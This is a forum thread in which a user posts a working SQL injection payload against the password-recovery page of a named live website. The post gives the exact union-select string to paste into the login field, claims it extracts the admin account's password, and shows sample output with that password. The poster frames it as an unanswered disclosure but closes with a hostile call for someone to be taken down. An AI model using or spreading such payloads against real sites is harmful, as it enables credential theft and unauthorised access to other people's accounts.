republican-creole
site Search:


 
    All Forums Hot Topics Gallery






how-to block ads


 
Search Topic:
Uniqs:
118
Share Topic
Post a:
Post a:
AuthorAll Replies


WooooT

@venice01.fl.comcast.

heres a huge hole in the 30gigs.com website.

The vulnerability exists in »www.30gigs.com/getpassword/ page due to
lack of validation of user submitted data.
Proof of Concept:
enter »www.30gigs.com/getpassword/
and copy & paster this code in the Login field, finally submit the form.

not_existant' union select
1,1,1,1,1,UserPassword,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from users where
userLogin='admin

it will give an output like below, in which "runsit" corresponds to the
password of account "admin"
We have sent the password for your not_existant' union select
1,1,1,1,1,UserPassword,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from users where
userLogin='admin_at_30gigs.com account to run it

The site has been notified about the vulnerability 2 weeks ago, but no
response was taken.

maz is a b i t c h and its tims for him to go down HARD!


morbo
Complete Your Transaction

join:2002-01-22
00000

yowza


Sunday, 27-May 19:45:04 Terms of Use & Privacy | feedback | contact | Hosting by nac.net - DSL,Hosting & Co-lo
over 12.5 years online © 1999-2012 dslreports.com.
Most commented news this week
Hot Topics